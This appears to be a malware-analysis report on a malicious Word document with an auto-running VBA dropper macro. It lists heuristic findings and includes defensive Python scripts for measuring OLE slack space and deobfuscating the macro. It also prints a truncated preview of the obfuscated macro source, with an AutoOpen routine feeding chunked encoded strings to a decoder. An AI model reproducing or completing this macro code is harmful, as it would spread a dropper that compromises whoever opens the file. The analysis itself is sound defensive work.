Verdict: MALICIOUS (Risk Score 182)

Malware Insights

MITRE ATT&CK: T1059.005 (Command and Scripting Interpreter: Visual Basic), T1203 (Exploitation for Client Execution)
The sample is a malicious OLE (Word binary) document containing a VBA macro. The macro calls Shell(), a strong indicator of malicious intent, most likely used to launch a downloaded or decoded second-stage payload, and an AutoOpen procedure makes it run automatically when the document is opened. The recovered source is heavily obfuscated: every routine is padded with opaque If blocks that declare unused arrays and add never-defined names, and the strings handed to the decoder routine are split into short "+"-joined chunks (see the preview below). The payload itself is not directly visible, which is typical of droppers. The T1203 mapping rests on the unaccounted-for region flagged by OLE_SLACK_ANOMALY rather than on an identified exploit; see that heuristic's caveat.
Heuristics (6)

- VBA macros detected (medium, 2 related findings) [OLE_VBA_MACROS]: Document contains VBA macro code.
- Shell() call in VBA (critical) [OLE_VBA_SHELL]: Shell() call in VBA.
- AutoOpen macro (high) [OLE_VBA_AUTOOPEN]: AutoOpen macro.
- OLE document has large unaccounted-for region (high) [OLE_SLACK_ANOMALY]: OLE file is 110,663 bytes but its declared streams total only 32,627 bytes; 78,036 bytes (71%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure). Note that the figure is file size minus declared stream bytes, so it also counts the header, FAT and directory sectors and overstates the true slack somewhat; carve and inspect the unallocated sectors before treating the region as exploit content rather than padding or leftover data, since no parser CVE was attributed here.
- Legacy WordBasic auto-exec macro marker (medium) [OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note: that description is the rule's generic text. In this sample a VBA project was recovered (macros.bas below), so the marker corroborates the AutoOpen finding rather than indicating a WordBasic-only document.
- Embedded URL (info) [EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the standard DrawingML XML namespace that Office writes into documents containing drawing objects, not a host the document contacts.
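The check behind the OLE_SLACK_ANOMALY finding, as an added example rather than the analyzer's own code: a minimal [MS-CFB] compound-file walker that sums the stream sizes declared in the directory and counts the sectors the FAT marks free or never covers. It assumes a version 3 file whose FAT fits in the header's 109 DIFAT slots (ordinary Word .doc files). `build_sample` constructs a synthetic document, not this sample, whose layout reproduces the condition: one real stream followed by sectors no stream claims.

```python
import struct

# Sector tags and object types from the [MS-CFB] compound file format.
OLE_MAGIC = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1"
DIFSECT, FATSECT, ENDOFCHAIN, FREESECT = 0xFFFFFFFC, 0xFFFFFFFD, 0xFFFFFFFE, 0xFFFFFFFF
NOSTREAM, STREAM, ROOT = 0xFFFFFFFF, 2, 5


def slack_report(data):
    """Compare the stream sizes declared in the OLE directory with the bytes the
    FAT never allocates. Assumes a version 3 file with no DIFAT chain."""
    if data[:8] != OLE_MAGIC:
        raise ValueError("not an OLE compound file")
    sector_size = 1 << struct.unpack_from("<H", data, 0x1E)[0]
    num_fat, first_dir = struct.unpack_from("<II", data, 0x2C)
    if num_fat > 109:
        raise ValueError("DIFAT chain not supported by this example")
    fat = []
    for fat_sector in struct.unpack_from("<109I", data, 0x4C)[:num_fat]:
        off = (fat_sector + 1) * sector_size            # sector n starts after the 512-byte header
        fat.extend(struct.unpack_from("<%dI" % (sector_size // 4), data, off))

    streams, sector, seen = [], first_dir, set()
    while sector < len(fat) and sector not in seen:     # walk the directory chain
        seen.add(sector)
        base = (sector + 1) * sector_size
        for i in range(sector_size // 128):             # 128-byte directory entries
            entry = data[base + 128 * i: base + 128 * (i + 1)]
            name_len, obj_type = struct.unpack_from("<HB", entry, 0x40)
            if obj_type == STREAM:                      # skip root, storages and unused slots
                name = entry[:max(name_len - 2, 0)].decode("utf-16-le", "replace")
                streams.append((name, struct.unpack_from("<I", entry, 0x78)[0]))
        sector = fat[sector]

    body = len(data) - sector_size
    unallocated = body % sector_size                    # trailing partial sector
    for idx in range(body // sector_size):              # sectors marked free or beyond the FAT
        if idx >= len(fat) or fat[idx] == FREESECT:
            unallocated += sector_size
    declared = sum(size for _, size in streams)
    return {
        "file_size": len(data),
        "declared_stream_bytes": declared,
        "unallocated_bytes": unallocated,
        "unallocated_pct": round(100.0 * unallocated / len(data), 1),
        "streams": streams,
    }


def build_sample(free_sectors=3, trailing=100):
    """Constructed input (not a real document): a minimal OLE file with one
    4,608-byte stream in sectors 2..10, followed by sectors the FAT leaves free
    and a partial trailing sector, the layout the slack heuristic flags."""
    ss = 512
    hdr = bytearray(ss)
    hdr[:8] = OLE_MAGIC
    struct.pack_into("<HHHHH", hdr, 0x18, 0x3E, 3, 0xFFFE, 9, 6)      # versions, byte order, shifts
    struct.pack_into("<II", hdr, 0x2C, 1, 1)                            # one FAT sector, directory in sector 1
    struct.pack_into("<IIIII", hdr, 0x38, 0x1000, ENDOFCHAIN, 0, ENDOFCHAIN, 0)  # mini-stream, DIFAT fields
    struct.pack_into("<109I", hdr, 0x4C, 0, *([FREESECT] * 108))        # DIFAT: the FAT lives in sector 0
    chain = [FATSECT, ENDOFCHAIN] + list(range(3, 11)) + [ENDOFCHAIN]   # 0 FAT, 1 dir, 2..10 stream
    fat = struct.pack("<128I", *(chain + [FREESECT] * (128 - len(chain))))

    def entry(name, obj_type, child, start, size):
        e = bytearray(128)
        n = name.encode("utf-16-le") + b"\0\0"
        e[:len(n)] = n
        struct.pack_into("<HBB", e, 0x40, len(n), obj_type, 1)         # name length, type, colour
        struct.pack_into("<III", e, 0x44, NOSTREAM, NOSTREAM, child)    # siblings, child
        struct.pack_into("<II", e, 0x74, start, size)                   # start sector, size
        return bytes(e)

    directory = entry("Root Entry", ROOT, 1, ENDOFCHAIN, 0)
    directory += entry("WordDocument", STREAM, NOSTREAM, 2, 9 * ss)
    directory += bytes(ss - len(directory))                             # remaining entries unused (type 0)
    stream = b"A" * (9 * ss)
    hidden = b"\x90" * (ss * free_sectors + trailing)                   # bytes no stream claims
    return bytes(hdr) + fat + directory + stream + hidden


if __name__ == "__main__":
    print(slack_report(build_sample()))
```

On the constructed file this reports 1,636 unallocated bytes against 4,608 declared stream bytes. The FAT-based count is the tighter figure: the report's "file size minus declared streams" arithmetic also charges the header, FAT and directory sectors to the anomaly. Either way, the next step is to carve the free sectors (`data[(idx + 1) * sector_size:]` for each flagged `idx`) and look at their entropy and XOR-key candidates rather than trusting the byte count alone.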
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 17,015 bytes | 2f8dd559016d4b194238a71ebfa68eeba886e9c5d42c99cfe8899b17408426aa |

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "QMNSoaAmVzfOJz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
If uphZEG Xor 19 Then
Dim poQnC()
JWDRr = UwnOij + jplcSP
ziwPW = HviHL + UPzGLt
End If
If zhGaz Eqv KWhDMw Then
Dim Ccaao()
clYNfC = LdkiZi + GAQcVQ
EkNivN = RnYjW + NXbTaY + hjmwi + VRCMwF
End If
If YAKjk Eqv itqLCD Then
Dim PjZwCz()
vXzOA = rwPba + zfpWQk
iaoqbw = sFhcPw + NXACv + SzjdPl + FFaNIM
End If
If HjWSaZ <> QmLiSk Then
Dim oUUBX()
uKapUV = iUUCkt + PUfcIt + PqDHJ + wmtoK
dpzGhw = lHwSJ + ZHsUor + dZiTXi + Arrbf
End If
If PnSNwi Or HDTYu Then
Dim jNDSE()
QKDKdi = nEuQUm + wJTaG + NqWWLv + UbmnZW
End If
If kMcofz < zMnwld Then
Dim audMO()
aojziF = MRHqwD + Ozqlap
End If
hbWkwEoCimwP (WLJnKkiM + FooYO + OVqIum + CEzbanwA + DNwVnkddzl + hASSmvAn + mNHfsff + MnnhhCFYLwd + wNZEDt + mJbZi + jMJzG + KMIAAvfd)
If WdhFw And hnzcD Then
Dim lYLjiz()
ZGXLYz = qCpSSN + BTuJEn
bMGYp = bjoRR + qjSwRI
End If
End Sub
Attribute VB_Name = "KizjKpMjE"
Function WLJnKkiM()
If ofzzWN <> 13 Then
Dim GsiWs()
wQBzQ = MmWWoW + YHCOq
kjNJX = ibUKAD + VwMSHI
End If
If TISIL Eqv KoREis Then
Dim IXlHi()
mKrbV = wBPMo + GzrRbu
End If
fMkGhpbJV = "`ja ,S[7[L,@ [p" + "[b[q [d[E[p:[{[=" + "[y[ [n[g[6" + " od![ D[w[N[ [A[X[]"
If TmDGW Xor 6 Then
Dim YNZaL()
tGBbhz = PZvbcJ + ucqwr + RISXo + zIXop
dRMqqp = wLzjYK + wzQwWd
End If
If uRZnw > 4 Then
Dim QUtoZl()
BZwUvQ = jarlT + dQwlM + PSHvd + CopaZj
End If
If Lkodn = whrlF Then
Dim wrLDlB()
uvUbt = NYBrb + MBYGc
MChwi = vSUcF + NKVbpJ
End If
EoNTdaM = "[ os[2[ [j[g[_[ [I" + "[p[3[ [X[G" + "[r[ [h[{[e[ [M[)[J[" + " [x[C[i[ " + """" + "S8"
wWQLY = "[ [F[1[6[ [p[J[E" + "[ [-[X[C K[W[*[" + " [5[r[t[z[fs" + "[N[z[N&[Z[x" + """" + "[j" + "[x[e[6[g[x`[M"
If MlWGu Eqv bdTaoU Then
Dim MzYIbK()
QtdVb = caFBKi + ORfZiS
opnUo = WcqCQ + szlSH
End If
RjjjhMw = "[q[>[q[/[M[(" + "[^g[q[P`[j[][v" + "[z[c[#m[8[" + "/[w[\[h[+[5[_[^[G[" + "*[Bb[!a[=o[I[N[M[_"
If asEno < 2 Then
Dim qLHBj()
nHbPk = rjdVjA + OFUjvh + GoZsu + rdDDzN
End If
If PBXRP <> 8 Then
Dim VRuTz()
JnhbGJ = CXAjCl + pCdzY + zRHnR + FjDEh
End If
If FksDPS Xor MkEMEJ Then
Dim DVcLUQ()
ziiUm = NfaVSO + IVcjj
End If
If wDViw Or 5 Then
Dim hUIVZG()
oXOvH = ODjlXp + LOVLi
tdvSaG = nCviFC + zkzkj + uPHPRz + rTSzzq
End If
If mvFQJ <= 13 Then
Dim wVcdP()
UjJPT = vvbdrj + KkDzwS + NzwKk + UmZBWo
WwowTk = mbbJD + WwbuY
End If
hoGzqrjVWKj = "[$[c@[8[][h[r[A[G" + "[m-[>[g[j@[c[<" + "KY[![6[^" + """" + "[ [.[M[f"
WLJnKkiM = fMkGhpbJV + EoNTdaM + wWQLY + RjjjhMw + hoGzqrjVWKj
If DUjqnQ Or 19 Then
Dim hbntUM()
CJicf = jKiupI + itvfF + VvNCd + WnwwhY
pCTSzE = dNtlmB + zrofIn
End If
If LoGEdI >= iLAVuT Then
Dim OazaV()
IBbQc = XvJTZ + azriMs
aifilQ = MjdNi + RvhJMp + KlDYrb + UUXjOE
End If
End Function
Function FooYO()
If dSqzVH > RwkrTi Then
Dim hSWQQ()
aGqJhm = MtwdhW + ErWqH
End If
sCFHokY = "[j[)[?Kb`[1I[qK[" + "_O[F[c[y[8[*[t[" + "M[g[b[a[b[F[h[t[c" + "[A[l0[g[Is%[*[" + ">kS[=[a[F[" + "T[z[h[8[=[x[^&[9"
If bHkQpC < RsokGS Then
Dim bhSiP()
YzHJzb = qvjJM + ofjYRz + WbGpzQ + hPpXYo
NdzbS = pzVLf + PdrrI
End If
bGSvFAA = "[+[?[A[0[N[Q" + "[>[q[M[y[c[" + "5f[([![ [6[{[ ["
If EwrSL And 17 Then
Dim qfbGIk()
TbBkz = jzXGuJ + BHqXjW
OSRmhP = XKYODu + wBpHLD
End If
CMwjQass = "\[n[_[)[B[z[A[" + "H[=[7[B[G[]Q[E[F[N,[" + "*[![-[D[Q%u[c[y[b[Y" + "[U[Vi:&[Q[f[5[" + "I[v[C[X[2[7["
MwdpmBpCH = "a[A[w[E[^[6[ [b" + "[l@[y[([is[" + ">[0k[B[bK[t"
FooYO = sCFHokY + bGSvFAA + CMwjQass + MwdpmBpCH
If qwIkfi Eqv DamwKA Then
Dim OChLL()
wrrPcE = AQVTk + laqZfG + VVoRwn + rbEdrq
iwEsIa = nmFTOW + jXdCF
End If
If MHfJdC >= vqHsrw Then
Dim udQbi()
bLOQoz = WXIFD + TcTJn + EQHXp + PXETXD
End If
If dCaSo =
... (truncated)
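Triage of the preview above, as an added example that is not part of the analyzer's output: the macro pads every routine with opaque If blocks that Dim unused arrays and add never-defined names, and splits the strings it feeds to its decoder into "+"-joined chunks. The script strips that junk, folds the chunks back into single literals, and reports auto-exec and execution keywords. `SAMPLE_VBA` is a trimmed excerpt of the preview (the decoder call's argument list is shortened to two names), the indicator table is a small subset of the kind olevba uses (an assumption for this example, not olevba's table), and the decoder routine `hbWkwEoCimwP` is not on the page, so the folded strings are reported as-is rather than decoded.

```python
import re

# Assumption: a small keyword subset in the spirit of olevba's auto-exec and
# execution lists, not the tool's full table.
INDICATORS = {
    "AutoOpen": "runs when the document is opened",
    "Document_Open": "runs when the document is opened",
    "Shell": "executes a command line",
    "WScript.Shell": "executes a command line via WSH",
    "CreateObject": "instantiates a COM object (downloaders, shells)",
    "Environ": "reads environment variables (drop paths)",
}

LITERAL = r'"(?:[^"]|"")*"'                       # VBA literal, "" is an escaped quote
RE_LITERAL = re.compile(LITERAL)
RE_LIT_ASSIGN = re.compile(r'^\s*(\w+)\s*=\s*((?:%s\s*\+\s*)*%s)\s*$' % (LITERAL, LITERAL))
RE_ID_ASSIGN = re.compile(r'^\s*(\w+)\s*=\s*(\w+(?:\s*\+\s*\w+)*)\s*$')
RE_DIM_JUNK = re.compile(r'^\s*Dim\s+\w+\(\)\s*$')
RE_IF = re.compile(r'^\s*If\b.*\bThen\s*$')
RE_END_IF = re.compile(r'^\s*End If\s*$')
RE_PROC = re.compile(r'^\s*(?:Sub|Function)\s+(\w+)')

# Constructed input: a trimmed excerpt of the preview on this page.
SAMPLE_VBA = r'''Sub AutoOpen()
If uphZEG Xor 19 Then
Dim poQnC()
JWDRr = UwnOij + jplcSP
ziwPW = HviHL + UPzGLt
End If
hbWkwEoCimwP (WLJnKkiM + FooYO)
End Sub
Function WLJnKkiM()
If ofzzWN <> 13 Then
Dim GsiWs()
wQBzQ = MmWWoW + YHCOq
End If
fMkGhpbJV = "`ja ,S[7[L,@ [p" + "[b[q [d[E[p:[{[=" + "[y[ [n[g[6" + " od![ D[w[N[ [A[X[]"
EoNTdaM = "[ os[2[ [j[g[_[ [I" + "[p[3[ [X[G" + "[r[ [h[{[e[ [M[)[J[" + " [x[C[i[ " + """" + "S8"
WLJnKkiM = fMkGhpbJV + EoNTdaM
End Function
'''


def decode_literal(tok):
    return tok[1:-1].replace('""', '"')


def deobfuscate(src):
    """Drop junk lines (Dim of unused arrays, arithmetic on names nothing ever
    defines, the If/End If that guarded only junk) and fold chunked literals."""
    lines = src.splitlines()
    # Names that carry meaning: procedure names and anything assigned a literal.
    meaningful = {m.group(1) for l in lines for m in [RE_PROC.match(l)] if m}
    meaningful |= {m.group(1) for l in lines for m in [RE_LIT_ASSIGN.match(l)] if m}
    out = []
    for line in lines:
        if RE_DIM_JUNK.match(line):
            continue
        m = RE_ID_ASSIGN.match(line)
        if m and not any(n in meaningful for n in re.findall(r'\w+', m.group(2))):
            continue                                  # e.g. JWDRr = UwnOij + jplcSP
        if RE_END_IF.match(line) and out and RE_IF.match(out[-1]):
            out.pop()                                 # the If block body was all junk
            continue
        m = RE_LIT_ASSIGN.match(line)
        if m:
            joined = "".join(decode_literal(t) for t in RE_LITERAL.findall(m.group(2)))
            line = '%s = "%s"' % (m.group(1), joined.replace('"', '""'))
        out.append(line)
    return out


def string_constants(src):
    """Variable name -> folded string, for every literal assignment left after cleanup."""
    consts = {}
    for line in deobfuscate(src):
        m = RE_LIT_ASSIGN.match(line)
        if m:
            consts[m.group(1)] = decode_literal(m.group(2))
    return consts


def indicators(src):
    """Keywords from INDICATORS present in the cleaned source."""
    text = "\n".join(deobfuscate(src))
    return {k: v for k, v in INDICATORS.items() if re.search(r'\b%s\b' % re.escape(k), text)}


if __name__ == "__main__":
    print("\n".join(deobfuscate(SAMPLE_VBA)))
    print(indicators(SAMPLE_VBA))
```

On the excerpt the 17 lines collapse to 8, leaving the AutoOpen entry point, the decoder call, and the two folded strings that `WLJnKkiM` returns. The Shell() call the analyzer flagged is not in the visible portion, so `indicators` reports only AutoOpen here; running the same pass over the full macros.bas is the quickest way to locate it and the decoder's body, whose logic (the "[" separators every other character suggest a strip-and-substitute scheme, but that is a guess to verify, not a finding) is what turns these chunks into the command line.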